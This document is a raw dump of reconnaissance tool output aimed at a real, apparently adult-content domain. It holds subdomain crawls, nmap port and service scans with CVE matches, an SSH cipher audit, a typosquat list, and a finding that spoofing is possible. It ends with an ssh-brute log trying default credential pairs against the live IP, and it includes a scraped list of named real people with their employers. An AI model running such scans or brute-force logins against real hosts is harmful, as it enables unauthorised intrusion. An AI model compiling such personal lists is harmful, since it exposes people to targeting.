http://smtp.teengirls.top. + Date: 2020-08-26 + Crawling URL: http://smtp.teengirls.top.: + Links: + Crawling http://smtp.teengirls.top. + Searching for directories... + Searching open folders... + URL to crawl: http://pop.teengirls.top. + Date: 2020-08-26 + Crawling URL: http://pop.teengirls.top.: + Links: + Crawling http://pop.teengirls.top. + Searching for directories... + Searching open folders... + URL to crawl: http://mail.teengirls.top + Date: 2020-08-26 + Crawling URL: http://mail.teengirls.top: + Links: + Crawling http://mail.teengirls.top + Searching for directories... + Searching open folders... + URL to crawl: http://ftp.teengirls.top. + Date: 2020-08-26 + Crawling URL: http://ftp.teengirls.top.: + Links: + Crawling http://ftp.teengirls.top. + Searching for directories... + Searching open folders... + URL to crawl: https://mail.teengirls.top. + Date: 2020-08-26 + Crawling URL: https://mail.teengirls.top.: + Links: + Crawling https://mail.teengirls.top. ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727)) + Searching for directories... + Searching open folders... + URL to crawl: https://www.teengirls.top. + Date: 2020-08-26 + Crawling URL: https://www.teengirls.top.: + Links: + Crawling https://www.teengirls.top. ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727)) + Searching for directories... + Searching open folders... + URL to crawl: https://smtp.teengirls.top. + Date: 2020-08-26 + Crawling URL: https://smtp.teengirls.top.: + Links: + Crawling https://smtp.teengirls.top. ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727)) + Searching for directories... + Searching open folders... + URL to crawl: https://pop.teengirls.top. + Date: 2020-08-26 + Crawling URL: https://pop.teengirls.top.: + Links: + Crawling https://pop.teengirls.top. ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727)) + Searching for directories... + Searching open folders... + URL to crawl: https://mail.teengirls.top + Date: 2020-08-26 + Crawling URL: https://mail.teengirls.top: + Links: + Crawling https://mail.teengirls.top ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727)) + Searching for directories... + Searching open folders... + URL to crawl: https://ftp.teengirls.top. + Date: 2020-08-26 + Crawling URL: https://ftp.teengirls.top.: + Links: + Crawling https://ftp.teengirls.top. ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727)) + Searching for directories... + Searching open folders... --Finished-- Summary information for domain teengirls.top. ----------------------------------------- Domain Ips Information: IP: 212.86.108.165 HostName: mail.teengirls.top Type: MX HostName: tinytube.top Type: PTR HostName: mail.teengirls.top Type: MX Type: SPF HostName: www.teengirls.top. Type: A HostName: ftp.teengirls.top. Type: A HostName: mail.teengirls.top. Type: A HostName: smtp.teengirls.top. Type: A HostName: pop.teengirls.top. Type: A Country: Netherlands Is Active: True (port-unreach ttl 54) Port: 21/tcp open ftp syn-ack ttl 54 ProFTPD 1.3.5b Script Info: | ssl-cert: Subject: commonName=example.com/organizationName=XX/stateOrProvinceName=XX/countryName=XX Script Info: | Issuer: commonName=example.com/organizationName=XX/stateOrProvinceName=XX/countryName=XX Script Info: | Public Key type: rsa Script Info: | Public Key bits: 1024 Script Info: | Signature Algorithm: sha256WithRSAEncryption Script Info: | Not valid before: 2019-12-10T14:57:15 Script Info: | Not valid after: 2029-12-07T14:57:15 Script Info: | MD5: 11f1 3a92 f98c 3d96 6bcc 5364 fc15 6c53 Script Info: |_SHA-1: 52ac 3f31 d67e 69d5 1ab9 664b 68fb f1aa 233f e907 Port: 22/tcp open ssh syn-ack ttl 54 OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0) Script Info: | ssh-hostkey: Script Info: | 2048 89:e2:fc:31:f3:d0:4d:b0:17:85:f9:83:ef:c3:cf:a4 (RSA) Script Info: | 256 a9:72:e2:82:ba:05:fc:44:19:1d:9a:c3:15:c0:89:28 (ECDSA) Script Info: |_ 256 3a:ca:80:35:34:89:6f:e5:f0:40:a3:10:e5:95:be:f7 (ED25519) Port: 25/tcp open smtp syn-ack ttl 54 Exim smtpd 4.89 Script Info: | smtp-commands: tinytube.top Hello nmap.scanme.org [212.102.41.26], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN CRAM-MD5, STARTTLS, HELP, Script Info: |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP Script Info: | ssl-cert: Subject: commonName=tinytube/organizationName=XX/stateOrProvinceName=XX/countryName=XX Script Info: | Issuer: commonName=tinytube/organizationName=XX/stateOrProvinceName=XX/countryName=XX Script Info: | Public Key type: rsa Script Info: | Public Key bits: 1024 Script Info: | Signature Algorithm: sha256WithRSAEncryption Script Info: | Not valid before: 2019-12-10T14:54:54 Script Info: | Not valid after: 2029-12-07T14:54:54 Script Info: | MD5: d862 4fbb 1c58 e09f c320 9ef2 0e49 f927 Script Info: |_SHA-1: 36c1 4131 9f04 1953 e507 6b4f c4ef 1286 6563 dbca Script Info: |_ssl-date: 2020-08-27T03:31:41+00:00; -4s from scanner time. Port: 53/tcp open domain syn-ack ttl 54 ISC BIND 9.10.3-P4 (Debian Linux) Script Info: | dns-nsid: Script Info: |_ bind.version: 9.10.3-P4-Debian Port: 80/tcp open http syn-ack ttl 54 Apache httpd 2.4.25 ((Debian)) Script Info: | http-methods: Script Info: |_ Supported Methods: OPTIONS HEAD GET POST Script Info: |_http-server-header: Apache/2.4.25 (Debian) Script Info: |_http-title: Welcome! Port: 110/tcp open pop3 syn-ack ttl 54 Dovecot pop3d Script Info: |_pop3-capabilities: SASL(PLAIN LOGIN DIGEST-MD5 CRAM-MD5) AUTH-RESP-CODE RESP-CODES STLS CAPA TOP USER UIDL PIPELINING Script Info: |_ssl-date: TLS randomness does not represent time Port: 143/tcp open imap syn-ack ttl 54 Dovecot imapd Script Info: |_imap-capabilities: LITERAL+ SASL-IR capabilities AUTH=LOGIN AUTH=PLAIN LOGIN-REFERRALS AUTH=DIGEST-MD5 IDLE OK STARTTLS have ENABLE listed more post-login IMAP4rev1 AUTH=CRAM-MD5A0001 ID Pre-login Script Info: |_ssl-date: TLS randomness does not represent time Port: 443/tcp open ssl/http syn-ack ttl 54 Apache httpd 2.4.25 Script Info: | http-methods: Script Info: |_ Supported Methods: GET HEAD POST Script Info: |_http-server-header: Apache/2.4.25 (Debian) Script Info: |_http-title: Cum 4K Script Info: | ssl-cert: Subject: commonName=cum4k.xyz/organizationName=XX/stateOrProvinceName=XX/countryName=XX Script Info: | Issuer: commonName=cum4k.xyz/organizationName=XX/stateOrProvinceName=XX/countryName=XX Script Info: | Public Key type: rsa Script Info: | Public Key bits: 2048 Script Info: | Signature Algorithm: sha256WithRSAEncryption Script Info: | Not valid before: 2019-12-29T16:48:29 Script Info: | Not valid after: 2020-12-28T16:48:29 Script Info: | MD5: 37de ee1c 6109 1208 f813 ba56 cbb9 4faf Script Info: |_SHA-1: 4137 d880 4fd5 f7db 4677 7260 c18a c8ca 4bce 09c6 Script Info: |_ssl-date: TLS randomness does not represent time Script Info: | tls-alpn: Script Info: |_ http/1.1 Port: 465/tcp open ssl/smtp syn-ack ttl 52 Exim smtpd 4.89 Script Info: |_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: failed to receive data Script Info: | ssl-cert: Subject: commonName=tinytube/organizationName=XX/stateOrProvinceName=XX/countryName=XX Script Info: | Issuer: commonName=tinytube/organizationName=XX/stateOrProvinceName=XX/countryName=XX Script Info: | Public Key type: rsa Script Info: | Public Key bits: 1024 Script Info: | Signature Algorithm: sha256WithRSAEncryption Script Info: | Not valid before: 2019-12-10T14:54:54 Script Info: | Not valid after: 2029-12-07T14:54:54 Script Info: | MD5: d862 4fbb 1c58 e09f c320 9ef2 0e49 f927 Script Info: |_SHA-1: 36c1 4131 9f04 1953 e507 6b4f c4ef 1286 6563 dbca Script Info: |_ssl-date: 2020-08-27T03:34:26+00:00; +2m42s from scanner time. Port: 587/tcp open smtp syn-ack ttl 52 Exim smtpd 4.89 Script Info: | smtp-commands: tinytube.top Hello nmap.scanme.org [212.102.41.26], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN CRAM-MD5, STARTTLS, HELP, Script Info: |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP Script Info: | ssl-cert: Subject: commonName=tinytube/organizationName=XX/stateOrProvinceName=XX/countryName=XX Script Info: | Issuer: commonName=tinytube/organizationName=XX/stateOrProvinceName=XX/countryName=XX Script Info: | Public Key type: rsa Script Info: | Public Key bits: 1024 Script Info: | Signature Algorithm: sha256WithRSAEncryption Script Info: | Not valid before: 2019-12-10T14:54:54 Script Info: | Not valid after: 2029-12-07T14:54:54 Script Info: | MD5: d862 4fbb 1c58 e09f c320 9ef2 0e49 f927 Script Info: |_SHA-1: 36c1 4131 9f04 1953 e507 6b4f c4ef 1286 6563 dbca Script Info: |_ssl-date: 2020-08-27T03:34:31+00:00; +2m46s from scanner time. Port: 993/tcp open ssl/imaps? syn-ack ttl 54 Script Info: |_ssl-date: TLS randomness does not represent time Port: 995/tcp open ssl/pop3s? syn-ack ttl 54 Script Info: |_ssl-date: TLS randomness does not represent time Os Info: Hosts: tinytube.top, cum4k.xyz; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Script Info: |_clock-skew: mean: 1m47s, deviation: 1m37s, median: 2m41s Open Folders: http://www.teengirls.top./images/ Open Folders: http://www.teengirls.top./content/ Open Folders: http://www.teengirls.top./css/ Open Folders: http://www.teengirls.top./icon/ Open Folders: http://www.teengirls.top./images/ Open Folders: http://www.teengirls.top./content/ Open Folders: http://www.teengirls.top./css/ Open Folders: http://www.teengirls.top./icon/ --------------End Summary -------------- ----------------------------------------- ##################################################################################################################################### Akilah Blount - Founding President and CEO - BEE Club Inc. Alison Springer - Founder - Young Women of Power Alissa Chavez - CEO - Assila LLC Carla Body - Top model - Revlon Cathy Standiford - Writer - Self-Employed Dannielle Miller - CEO - ENLIGHTEN EDUCATION David Rothfeder - Fraud Analyst - Best Buy Dianne Erickson - Buyer - Best and Less Pty Ltd Dr. Tangela D. Harris - CEO - T D Harris International Gianna Lucas - On Air Announcer - PositiveMedia Herta Feely - Founder - Chrysalis Editorial Jenni Luke - Vice President - San Francisco 49ers Jill Wheeler - Owner - Wellfit Institute Juli Kaufmann - President - Fix Development LLC Kim Millman - Attorney - Law Office of Kim Millman Kristen Hicks Kristin Monaco - Director of Customer Care - Optoro Kween Klarke - Substitute Teacher - Alvin ISD La Tonya Brown - Executive Director - Leading Ladies Lori Brasfield - Owner - Lola B Boutique Mallun Yen - Founder and Partner - Operator Collective Maria Jones - Head Coach - Orange Theory Fitness Michelle Lorenzi - Family Owner - Lorenzi Estate Wines Michelle Mattingly - Account Executive - SperiTek Nerissa Holder Hall - Senior Producer - Pinna Peter Bakalian - Principal - Perisphere Pictures Rachel Griffiths - Specialty Sales Manager - Best Buy Roshni Patel - Internship - Girl Scouts of the USA Sally Clark - Author - Self-employed Sara Dunn - Client Engagement Manager - Cargo Sarah Jo Sautter - Director of Marketing - JGA Sarah Legband - Owner - Legband Enterprises Stephanie Brocoum - CMO - edX Susan Friebert - Board Member - Pearls for Teen Girls Tami Overall - Machine Support Supervisor - Redbox Teen Girls - Misc - Treatscollective Tessa Marie Swarthout - Owner - Tessa Marie Studios Theresa Dzubak - Senior Digital Copywriter - Best Buy Tina Collins - Founder - Leading From My Cubicle Triska Moosa - Life Coach - Personal Business Vicki King - Senior Buyer Teen Girls - Target Australia Wolf Loescher - Director of Development - Brandpoint Zandra A. Cunningham - CEO - Zandra Beauty bella woody-scott - Vice President - Girls Spark sahar zigdon - Owner - ice cream truck ##################################################################################################################################### URLCrazy Domain Report Domain : teengirls.top Keyboard : qwerty At : 2020-08-26 23:52:09 -0400 # Please wait. 2069 hostnames to process Typo Type Typo Domain IP Country NameServer MailServer ------------------------------------------------------------------------------------------------------------------------------------------------------------------ Original teengirls.top 212.86.108.165 NETHERLANDS (NL) ns1.example.com. mail.teengirls.top. Character Omission teegirls.top Character Omission teengils.top Character Omission teengirl.top 172.67.140.241 UNITED STATES (US) gene.ns.cloudflare.com. Character Omission teengirls.to Character Omission teengirls.tp Character Omission teengirs.top Character Omission teengrls.top Character Omission teenirls.top Bit Flipping taengirls.top Bit Flipping tdengirls.top Bit Flipping tedngirls.top Bit Flipping tee.girls.top 218.247.64.56 CHINA (CN) Bit Flipping teefgirls.top Bit Flipping teejgirls.top Bit Flipping teelgirls.top teengirls.aq Wrong TLD teengirls.aquarelle Wrong TLD teengirls.arab 127.0.53.53 RESERVED (ZZ) your-dns-needs-immediate-attention.arab. Wrong TLD teengirls.aramco Wrong TLD teengirls.archi Wrong TLD teengirls.army Wrong TLD Wrong TLD teengirls.bcn Wrong TLD teengirls.be 198.23.57.183 UNITED STATES (US) dns2.freehostia.com. mbox.freehostia.com. Wrong TLD teengirls.beats Wrong TLD teengirls.beauty Wrong TLD teengirls.beer teengirls.bz Wrong TLD teengirls.bzh Wrong TLD teengirls.ca 158.85.87.76 UNITED STATES (US) slns2.namespro.ca. mail.teengirls.ca. Wrong TLD teengirls.cab Wrong TLD teengirls.cafe Wrong TLD teengirls.cal Wrong TLD teengirls.call Wrong TLD ##################################################################################################################################### "asn": "AS204601", "asnname": "ON-LINE-DATA Server location - Netherlands, Dronten, UA", "country": "NL", "domain": "teengirls.top", "ip": "212.86.108.165", "server": "Apache/2.4.25 (Debian)", "url": "http://teengirls.top/" "url": "http://teengirls.top/", ##################################################################################################################################### [*] Processing domain teengirls.top [*] Using system resolvers ['10.101.0.243'] [+] Getting nameservers [-] Getting nameservers failed [-] Zone transfer failed [+] TXT records found "v=spf1 ip4:212.86.108.165 a mx ~all" [+] MX records found, added to target list 10 mail.teengirls.top. 20 mail.teengirls.top. [*] Scanning teengirls.top for A records 212.86.108.165 - teengirls.top 212.86.108.165 - mail.teengirls.top 212.86.108.165 - ftp.teengirls.top 212.86.108.165 - mail.teengirls.top 212.86.108.165 - pop.teengirls.top 212.86.108.165 - smtp.teengirls.top 212.86.108.165 - www.teengirls.top ##################################################################################################################################### [*] Found SPF record: [*] v=spf1 ip4:212.86.108.165 a mx ~all [*] SPF record contains an All item: ~all [*] No DMARC record found. Looking for organizational record [+] No organizational DMARC record [+] Spoofing possible for teengirls.top! ##################################################################################################################################### [:] ASN: 204601 / ON-LINE-DATA Server location - Netherlands, Dronten, NL [:] Writing 154 CIDRs to file... [:] Converting to IPs... [:] Writing 63948 IPs to file... ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 23:57 EDT Nmap scan report for teengirls.top (212.86.108.165) Host is up (0.16s latency). rDNS record for 212.86.108.165: tinytube.top Not shown: 484 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 143/tcp open imap 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s Nmap done: 1 IP address (1 host up) scanned in 2.64 seconds #################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 23:57 EDT Nmap scan report for teengirls.top (212.86.108.165) Host is up (0.16s latency). rDNS record for 212.86.108.165: tinytube.top Not shown: 12 closed ports PORT STATE SERVICE 53/udp open domain 68/udp open|filtered dhcpc 123/udp open ntp Nmap done: 1 IP address (1 host up) scanned in 6.97 seconds ##################################################################################################################################### https://teengirls.top http://teengirls.top {"site":"https://teengirls.top","status_code":200,"server":"Apache/2.4.25 (Debian)","content_type":"text/html; charset=UTF-8","location":""} {"site":"http://teengirls.top","status_code":200,"server":"Apache/2.4.25 (Debian)","content_type":"text/html; charset=UTF-8","location":""} ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 23:57 EDT NSE: Loaded 54 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 23:57 Completed NSE at 23:57, 0.00s elapsed Initiating NSE at 23:57 Completed NSE at 23:57, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 23:57 Completed Parallel DNS resolution of 1 host. at 23:57, 0.05s elapsed Initiating SYN Stealth Scan at 23:57 Scanning teengirls.top (212.86.108.165) [1 port] Discovered open port 21/tcp on 212.86.108.165 Completed SYN Stealth Scan at 23:57, 0.19s elapsed (1 total ports) Initiating Service scan at 23:57 Scanning 1 service on teengirls.top (212.86.108.165) Completed Service scan at 23:57, 0.72s elapsed (1 service on 1 host) Initiating OS detection (try #1) against teengirls.top (212.86.108.165) Retrying OS detection (try #2) against teengirls.top (212.86.108.165) Initiating Traceroute at 23:57 Completed Traceroute at 23:57, 3.01s elapsed Initiating Parallel DNS resolution of 9 hosts. at 23:57 Completed Parallel DNS resolution of 9 hosts. at 23:58, 0.66s elapsed NSE: Script scanning 212.86.108.165. Initiating NSE at 23:58 NSE Timing: About 70.83% done; ETC: 23:59 (0:00:30 remaining) Completed NSE at 23:59, 90.83s elapsed Initiating NSE at 23:59 Completed NSE at 23:59, 0.05s elapsed Nmap scan report for teengirls.top (212.86.108.165) Host is up (0.16s latency). rDNS record for 212.86.108.165: tinytube.top PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5b | vulners: | cpe:/a:proftpd:proftpd:1.3.5b: | CVE-2019-19272 5.0 https://vulners.com/cve/CVE-2019-19272 |_ CVE-2019-19271 5.0 https://vulners.com/cve/CVE-2019-19271 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.16 - 4.6 (95%), Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 4.11 (94%), Linux 3.12 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 3.16 (94%) No exact OS matches for host (test conditions non-ideal). Uptime guess: 0.400 days (since Wed Aug 26 14:22:48 2020) Network Distance: 11 hops TCP Sequence Prediction: Difficulty=259 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Unix TRACEROUTE (using port 21/tcp) HOP RTT ADDRESS 1 52.47 ms 10.203.8.1 2 55.00 ms unn-185-152-66-238.datapacket.com (185.152.66.238) 3 55.37 ms 165.254.21.49 4 55.34 ms ae-3.r23.atlnga05.us.bb.gin.ntt.net (129.250.5.209) 5 ... 6 69.51 ms ae-1.r24.asbnva02.us.bb.gin.ntt.net (129.250.2.37) 7 158.59 ms ae-2.r25.amstnl02.nl.bb.gin.ntt.net (129.250.6.163) 8 153.32 ms ae-1.r04.amstnl02.nl.bb.gin.ntt.net (129.250.3.105) 9 152.52 ms ce-0-4-0-2.r04.amstnl02.nl.ce.gin.ntt.net (128.241.6.7) 10 ... 11 155.37 ms tinytube.top (212.86.108.165) NSE: Script Post-scanning. Initiating NSE at 23:59 Completed NSE at 23:59, 0.00s elapsed Initiating NSE at 23:59 Completed NSE at 23:59, 0.00s elapsed ##################################################################################################################################### # general (gen) banner: SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7 (gen) software: OpenSSH 7.4p1 (gen) compatibility: OpenSSH 7.3+, Dropbear SSH 2016.73+ (gen) compression: enabled (zlib@openssh.com) # key exchange algorithms (kex) curve25519-sha256 -- [warn] unknown algorithm (kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62 (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak) `- [info] available since OpenSSH 4.4 (kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73 (kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3 (kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73 (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53 # host-key algorithms (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28 (key) rsa-sha2-512 -- [info] available since OpenSSH 7.2 (key) rsa-sha2-256 -- [info] available since OpenSSH 7.2 (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves `- [warn] using weak random number generator could reveal the key `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (key) ssh-ed25519 -- [info] available since OpenSSH 6.5 # encryption algorithms (ciphers) (enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5 `- [info] default cipher since OpenSSH 6.9. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52 (enc) aes192-ctr -- [info] available since OpenSSH 3.7 (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52 (enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2 (enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2 # message authentication code algorithms (mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size `- [info] available since OpenSSH 6.2 (mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2 (mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2 (mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2 (mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm `- [info] available since OpenSSH 6.2 (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode `- [warn] using small 64-bit tag size `- [info] available since OpenSSH 4.7 (mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode `- [info] available since OpenSSH 6.2 (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56 (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56 (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode `- [warn] using weak hashing algorithm `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28 # algorithm recommendations (for OpenSSH 7.4) (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove (rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove (rec) -hmac-sha2-512 -- mac algorithm to remove (rec) -umac-128@openssh.com -- mac algorithm to remove (rec) -hmac-sha2-256 -- mac algorithm to remove (rec) -umac-64@openssh.com -- mac algorithm to remove (rec) -hmac-sha1 -- mac algorithm to remove (rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove (rec) -umac-64-etm@openssh.com -- mac algorithm to remove #################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 23:59 EDT NSE: Loaded 51 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 23:59 Completed NSE at 23:59, 0.00s elapsed Initiating NSE at 23:59 Completed NSE at 23:59, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 23:59 Completed Parallel DNS resolution of 1 host. at 23:59, 0.05s elapsed Initiating SYN Stealth Scan at 23:59 Scanning teengirls.top (212.86.108.165) [1 port] Discovered open port 22/tcp on 212.86.108.165 Completed SYN Stealth Scan at 23:59, 0.20s elapsed (1 total ports) Initiating Service scan at 00:00 Scanning 1 service on teengirls.top (212.86.108.165) Completed Service scan at 00:00, 0.33s elapsed (1 service on 1 host) Initiating OS detection (try #1) against teengirls.top (212.86.108.165) Retrying OS detection (try #2) against teengirls.top (212.86.108.165) Initiating Traceroute at 00:00 Completed Traceroute at 00:00, 3.01s elapsed Initiating Parallel DNS resolution of 9 hosts. at 00:00 Completed Parallel DNS resolution of 9 hosts. at 00:00, 0.80s elapsed NSE: Script scanning 212.86.108.165. Initiating NSE at 00:00 NSE: [ssh-run 212.86.108.165:22] Failed to specify credentials and command to run. NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:root NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:admin NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:administrator NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:webadmin NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:sysadmin NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:netadmin NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:guest NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:user NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:web NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:test NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root: NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin: NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator: NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin: NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin: NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin: NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest: NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user: NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web: NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test: NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:123456 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:123456 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:123456 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:123456 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:123456 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:123456 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:123456 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:123456 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:123456 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:123456 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:12345 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:12345 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:12345 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:12345 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:12345 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:12345 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:12345 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:12345 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:12345 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:12345 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:123456789 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:123456789 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:123456789 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:123456789 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:123456789 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:123456789 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:123456789 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:123456789 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:123456789 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:123456789 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:password NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:password NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:password NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:password NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:password NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:password NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:password NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:password NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:password NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:password NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:iloveyou NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:iloveyou NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:iloveyou NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:iloveyou NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:iloveyou NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:iloveyou NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:iloveyou NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:iloveyou NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:iloveyou NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:iloveyou NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:princess NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:princess NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:princess NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:princess 